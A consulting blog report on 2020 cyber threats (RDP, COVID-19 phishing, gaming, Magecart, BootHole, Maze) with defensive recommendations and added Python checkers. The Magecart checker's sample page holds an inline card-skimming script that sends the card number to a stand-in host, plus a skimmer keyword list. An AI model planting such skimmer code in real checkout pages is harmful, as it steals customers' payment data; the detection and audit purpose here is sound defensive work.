Part and parcel of a Data Protection programme is an awareness of the cyber security threats that are out there. A cyber security threat can be defined as “the possibility of a successful cyber-attack that aims to gain unauthorized access, damage, disrupt, or steal an information technology asset, computer network, intellectual property or any other form of sensitive data.” (Tunggal, 2020). In this report, I’ll be describing a number of key threats that have emerged during 2020 and the accompanying pandemic.

RDP Attacks

Remote Desktop attacks are nothing new; however, they do appear to be growing in prevalence. Telemetry from ESET’s Brute-Force Attack Protection shows a marked upswing in the number of unique clients reporting RDP attack attempts in the wild.

Figure 1: Trend of RDP attack attempts against unique clients per day (ESET, 2020)

RDP as a protocol is a particularly attractive target, given that many employees access their corporate resources through it. With work-from-home (WFH) becoming ever more common, many of these connections are exposed to the public internet. According to McAfee Labs, the number of RDP ports exposed to the internet grew from 3 million in January 2020 to roughly 4.5 million in March 2020 (Roccia, 2020).

Recommendations

There are secure ways to use RDP, and a number of recommendations can be made for ensuring this security. Microsoft issued an advisory in May 2019 detailing a fix for a Remote Code Execution vulnerability (CVE-2019-0708) in older versions of Windows (Microsoft Security Response Center, 2019). Patch your operating system to the current level and consider the options below (Roccia, 2020).

  • Disable internet-facing RDP on port 3389
  • Require strong and complex passwords
  • Use additional layers of authentication (MFA)
  • Use a VPN to access RDP infrastructure from outside
  • Install endpoint security
  • Update and replace outdated operating systems (prior to Windows 2012)

In addition to the above, if you use Microsoft Azure hosted services, use Azure Bastion (a managed bastion host) to reach your systems. It lets you connect to your virtual machines through the web browser, taking advantage of Azure’s multifactor authentication and other protections (Microsoft, 2020).

COVID-19 Phishing

The COVID-19 pandemic has proven to be a key vector of attack for phishers, where new attacks using socially engineered emails have bypassed security checks, and in some cases common sense (Montalbano, 2020).

The threat in question claimed to show important information about COVID-19 statistics in the reader’s area. It evaded Advanced Threat Protection (ATP) by impersonating a valid domain with a spoofed IP address. Because delivery was performed by a proxy that appeared legitimate, the email slipped past basic checks such as DKIM and SPF.

Once ATP has been evaded, the attack relies on social engineering and a spoofed email address of a trusted source, much like other phishing campaigns. Users who click the links in the email are taken to a sophisticated, well-designed fake Microsoft login page, where their credentials are harvested.

Recommendations

As with any phishing attack, this one is relatively easily mitigated by multifactor authentication. Enabling MFA or 2FA on your hosted services dramatically reduces the success rate of phishing attacks (Saunders, 2020). Instructions and links for enabling MFA on a multitude of services are available on our blog, at: https://www.rossgsaunders.com/2020/01/what-is-multi-factor-authentication-mfa/
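On the mail-filtering side, the weakness described above (SPF and DKIM passing for the delivering proxy while the visible sender is a trusted organisation) is caught by checking that the authenticated domain actually covers the From: domain, which is the alignment idea behind DMARC. The script below is an added example written for this post, not code from the original or from any vendor; the message, domains and the relaxed-alignment rule are constructed assumptions.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample message (not from the page): the relay that delivered
# the mail authenticates for its own domain, while the visible From: header
# claims a different, trusted organisation.
SAMPLE = """\
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bounce@relay-proxy.example; dkim=pass header.d=relay-proxy.example
From: "COVID-19 Updates" <alerts@trusted-org.example>
To: staff@example.net
Subject: COVID-19 statistics for your area

Please sign in to view the latest figures for your region.
"""


def authenticated_domains(msg):
    """Return the set of domains for which SPF or DKIM reported 'pass'."""
    hdr = str(msg.get("Authentication-Results", ""))
    domains = set()
    m = re.search(r"spf=(\w+)\s+smtp\.mailfrom=([^\s;]+)", hdr)
    if m and m.group(1).lower() == "pass":
        domains.add(m.group(2).rsplit("@", 1)[-1].lower())
    m = re.search(r"dkim=(\w+)\s+header\.d=([\w.\-]+)", hdr)
    if m and m.group(1).lower() == "pass":
        domains.add(m.group(2).lower())
    return domains


def from_domain(msg):
    """Domain of the visible From: header, i.e. what the reader sees."""
    _, addr = parseaddr(str(msg.get("From", "")))
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def check_alignment(raw):
    """Flag mail whose passing SPF/DKIM domain does not cover the From: domain.

    Relaxed alignment (assumed here): From: must equal, or be a subdomain of,
    an authenticated domain; organisational-domain lookup is omitted.
    """
    msg = email.message_from_string(raw, policy=policy.default)
    visible = from_domain(msg)
    authed = authenticated_domains(msg)
    aligned = any(visible == d or visible.endswith("." + d) for d in authed)
    return {"from_domain": visible, "authenticated": sorted(authed), "aligned": aligned}
```

A message that passes SPF and DKIM but is not aligned is exactly the case the page describes, and should be quarantined or tagged rather than delivered on the strength of those passes alone.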

Gaming

Online gaming has seen a sharp rise while people are working from home. Counter-Strike: Global Offensive, a popular game on the Steam platform, saw a rise to over 1 million concurrent players between the 18th of March and 2nd of June, 2020 (Steam Database, 2020).

Attacks on gamers often take the form of phishing and redirects to malicious gaming-related websites. Fake Steam platform sites increased by 40% between February and April, and the most targeted games on the platform are Minecraft, Counter-Strike: Global Offensive and The Witcher 3: Wild Hunt, in that order (Kaspersky Securelist, 2020).

Traditionally, the goal of these attacks was to gain access to a user’s wallet. But with the increased use of work computers at home and, more importantly, of home computers on poorly prepared corporate networks, attackers are able to exploit gaming vulnerabilities to reach corporate infrastructure (Kaspersky Securelist, 2020).

Recommendations

Ensure that your employees are aware of the very real cyber-security threat within the gaming environment. Updating your “Bring Your Own Device” (BYOD) policy is key, along with your corporate restrictions on applications and gaming. Managed anti-virus and Mobile Device Management are key value-adds in the fight against these threats. Microsoft 365 (formerly Office 365) and Google’s G Suite both have built-in Mobile Device Management that can be activated, with Microsoft Intune being particularly powerful on their enterprise packages.

Magecart

Magecart, an umbrella name for a collection of criminal groups, has been attacking e-commerce websites since 2014. Recently, the number of compromised sites has risen substantially. Their modus operandi is to inject malicious code into online shopping sites, allowing them to skim credit card information at checkout (Ferguson, 2019).

The eCommerce platform most affected by the attacks is Magento; however, other platforms are also affected, such as Shopify, OpenCart, OSCommerce and WordPress (Ferguson, 2019). Over 570 sites in 55 countries were targeted between April 2017 and July 2020, with two South African eCommerce sites among the highest-traffic victims (Gemini Advisory, 2020).

Recommendations

Ensure that your eCommerce site is regularly updated. Updates ensure that your site remains protected against known vulnerabilities that may be exploited. It is worthwhile having your site and code audited by a third party to ensure that you have not been affected. Finally, ensure that your administration, FTP and database logins use secure connection methods and have complex, difficult-to-guess passwords.
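Because Magecart works by injecting script into the checkout page, one concrete audit is to inventory every script the page loads and compare it against the hosts you expect. The example below is added here and is not code from the original post or from any platform; the shop hostnames, the allow-list, the sample page and the keyword heuristic are all constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this (hypothetical) shop is expected to load scripts from on checkout.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example", "js.payment-provider.example"}

# Constructed checkout page: one expected script, one injected script from a
# host that is not on the allow-list, and an inline script that reads card
# fields and sends them elsewhere (the coarse shape of a skimmer).
SAMPLE_HTML = """<html><head>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://static-cdn-assets.example/jquery.min.js"></script>
</head><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script>document.getElementById('payment').addEventListener('submit',function(){
  new Image().src='https://static-cdn-assets.example/c?d='+btoa(document.forms[0].cc_number.value);});</script>
</body></html>"""

# Two or more of these in one inline script is treated as worth a human look.
SKIMMER_HINTS = ("cc_number", "cvv", "cardnumber", "btoa(", "new Image()", "fetch(", "XMLHttpRequest")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []          # start capturing an inline script body

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_checkout(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Report script hosts outside the allow-list and skimmer-like inline scripts."""
    p = ScriptCollector()
    p.feed(html)
    hosts = {urlparse(u).hostname for u in p.external}   # relative src -> None (first party)
    unexpected = sorted(h for h in hosts if h and h not in allowed_hosts)
    suspicious = [s for s in p.inline if sum(h in s for h in SKIMMER_HINTS) >= 2]
    return {"unexpected_hosts": unexpected, "inline_scripts": len(p.inline),
            "suspicious_inline": len(suspicious)}
```

Run it against a saved copy of the live checkout page on a schedule and alert on any change in the output; a Content Security Policy with the same allow-list turns the same check into an enforced control in the browser.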

GRUB2

Billions of Windows and Linux devices are vulnerable to cyberattacks stemming from a bug in the GRUB2 bootloader, researchers are warning.

GRUB2 (which stands for the GRand Unified Bootloader version 2) is the default bootloader for the majority of computing systems. Its job is to manage part of the start-up process – it either presents a menu and awaits user input, or automatically transfers control to an operating system kernel.

From https://threatpost.com/billions-of-devices-impacted-secure-boot-bypass/157843/

A recently discovered bug in the GRUB2 bootloader could allow attackers to compromise servers and load malware in corporate and IoT networks. The bug, known as “BootHole”, allows an attacker to bypass Secure Boot protections between the startup of a computer and the handover to the operating system (Seals, 2020).

Given the complexity of changing the way GRUB2 functions and the sheer volume of systems making use of GRUB2, fixes and patches will be ongoing, often in a reactive manner. There is no easy mitigation (Red Hat, 2020).

The fault affects not only Linux but also Microsoft Windows systems that trust the third-party UEFI certificate authority. Both hardware and software providers will need to provide regular updates and certificate revocation lists to mitigate the issue on an ongoing basis (Seals, 2020).

Recommendations

Ensure that you keep your environments up to date. Various providers have issued their own advisories; it is recommended that you search for these and apply any mitigations given. Many of these updates will be manual, given the risk of damaging bootloaders and “bricking” systems (Seals, 2020).

Eclypsium, the research firm that initially discovered and disclosed the bug to manufacturers, recommends that the following steps be taken (Eclypsium, 2020). The original report is available here: https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/

  1. Start monitoring the contents of the bootloader partition (EFI system partition).
  2. Continue to install OS updates as usual across desktops, laptops, servers, and appliances.
  3. Test the revocation list update.
  4. To close this vulnerability, you need to deploy the revocation update. Make sure that all bootable media has received OS updates first, roll it out slowly to only a small number of devices at a time, and incorporate lessons learned from testing as part of this process.
  5. Engage with your third-party vendors to validate they are aware of, and are addressing, this issue.

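Step 1 above, monitoring the EFI system partition, can be done with a plain file-integrity baseline: hash everything on the partition right after a trusted update, then diff against that baseline on a schedule. The BootHole flaw is triggered through a modified grub.cfg, so the configuration file matters as much as the signed binaries. This script is an added example and not part of Eclypsium’s report or the original post; the partition layout it builds is constructed in a temporary directory, and the real mount point (commonly /boot/efi on Linux) is an assumption you would substitute.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def hash_tree(root):
    """Map each regular file under root (relative path) to its SHA-256 digest."""
    root = Path(root)
    digests = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            digests[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return digests


def save_baseline(root, baseline_file):
    """Record the partition state, e.g. immediately after applying a GRUB2 update."""
    Path(baseline_file).write_text(json.dumps(hash_tree(root), indent=2))


def compare_to_baseline(root, baseline_file):
    """Return files added, removed or changed since the baseline was taken."""
    old = json.loads(Path(baseline_file).read_text())
    new = hash_tree(root)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
    }


def demo():
    """Build a constructed ESP layout in a temp dir, baseline it, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        esp = Path(tmp) / "esp"            # stands in for a real mount such as /boot/efi
        (esp / "EFI" / "BOOT").mkdir(parents=True)
        (esp / "EFI" / "distro").mkdir(parents=True)
        (esp / "EFI" / "BOOT" / "BOOTX64.EFI").write_bytes(b"shim-placeholder")
        (esp / "EFI" / "distro" / "grubx64.efi").write_bytes(b"grub-placeholder")
        (esp / "EFI" / "distro" / "grub.cfg").write_text("set timeout=5\n")
        baseline = Path(tmp) / "esp-baseline.json"
        save_baseline(esp, baseline)
        # Simulated tampering: grub.cfg edited and an unexpected binary dropped in.
        (esp / "EFI" / "distro" / "grub.cfg").write_text("set timeout=5\ninsmod unexpected\n")
        (esp / "EFI" / "distro" / "extra.efi").write_bytes(b"unknown-binary")
        return compare_to_baseline(esp, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline file off the monitored partition and re-baseline only after a deliberate, verified update; any other change to the ESP is worth an incident ticket.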
Maze Ransomware

Maze is a particularly dangerous new-generation ransomware. As with most ransomware threats, it encrypts your computer and extorts money from you in order to decrypt and recover your files. What makes Maze much more dangerous than other ransomware is that it also sends your data to the attackers (Cluley, 2020).

After the data has been sent to the attackers and a ransom demand issued, an additional threat is raised: the attackers “weaponise” data protection legislation and stock exchange requirements. Should you not pay the ransom, they leak your information via their own website and inform the regulator and/or stock exchange of the breach (Cluley, 2020; Mundo, 2020).

Recommendations

Always be vigilant about downloads and attachments sent to you. Do not open files that you are not expecting and be sure to run reputable anti-malware and anti-virus solutions. Lastly, as with any ransomware, ensure you have backups of your data in order to recover.

Ross G Saunders Consulting offers a number of solutions that can drive your compliance with Privacy and Cyber Security; from affordable 16 week group coaching programmes to comply on your own, through to advisory retainers and full programme management. To find out more about the offerings available, book time directly with Ross using the calendar below.


References

Cluley, G., 2020. Maze Ransomware – What You Need to Know. [Online]
Available at: https://www.tripwire.com/state-of-security/featured/maze-ransomware-what-you-need-to-know/
[Accessed 20 August 2020].

Eclypsium, 2020. There’s a hole in the boot. [Online]
Available at: https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/
[Accessed 25 August 2020].

Ferguson, S., 2019. Magecart Group Continues Targeting E-Commerce Sites. [Online]
Available at: https://www.bankinfosecurity.com/magecart-group-continues-targeting-e-commerce-sites-a-12996
[Accessed 25 August 2020].

Gemini Advisory, 2020. “Keeper” Magecart Group Infects 570 Sites. [Online]
Available at: https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/
[Accessed 25 August 2020].

Kaspersky Securelist, 2020. Do cybercriminals play cyber games during quarantine?. [Online]
Available at: https://securelist.com/do-cybercriminals-play-cyber-games-during-quarantine/97241/
[Accessed 1 September 2020].

Microsoft Security Response Center, 2019. Prevent a worm by updating Remote Desktop Services (CVE-2019-0708). [Online]
Available at: https://msrc-blog.microsoft.com/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/
[Accessed 30 August 2020].

Microsoft, 2020. What is Azure Bastion?. [Online]
Available at: https://docs.microsoft.com/en-us/azure/bastion/bastion-overview
[Accessed 2 September 2020].

Montalbano, E., 2020. Top Email Protections Fail in Latest COVID-19 Phishing Campaign. [Online]
Available at: https://threatpost.com/top-email-protections-fail-covid-19-phishing/154329/
[Accessed 15 August 2020].

Mundo, A., 2020. Ransomware Maze. [Online]
Available at: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
[Accessed 15 August 2020].

Red Hat, 2020. Boot Hole Vulnerability – GRUB 2 boot loader – CVE-2020-10713. [Online]
Available at: https://access.redhat.com/security/vulnerabilities/grub2bootloader
[Accessed 30 August 2020].

Roccia, T., 2020. Cybercriminals Actively Exploiting RDP to Target Remote Organizations. [Online]
Available at: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cybercriminals-actively-exploiting-rdp-to-target-remote-organizations/
[Accessed 20 August 2020].

Saunders, R., 2020. What is Multi-factor Authentication (MFA)?. [Online]
Available at: https://www.rossgsaunders.com/2020/01/what-is-multi-factor-authentication-mfa/
[Accessed 15 August 2020].

Seals, T., 2020. Billions of Devices Impacted by Secure Boot Bypass. [Online]
Available at: https://threatpost.com/billions-of-devices-impacted-secure-boot-bypass/157843/
[Accessed 25 August 2020].

Steam Database, 2020. Counter-Strike: Global Offensive. [Online]
Available at: https://steamdb.info/app/730/graphs/
[Accessed 1 September 2020].

Tunggal, A. T., 2020. What is a Cyber Threat?. [Online]
Available at: https://www.upguard.com/blog/cyber-threat
[Accessed 2 August 2020].

A big thank you to Jennifer from Silver17 Consulting for her fantastic research assistance on this piece!
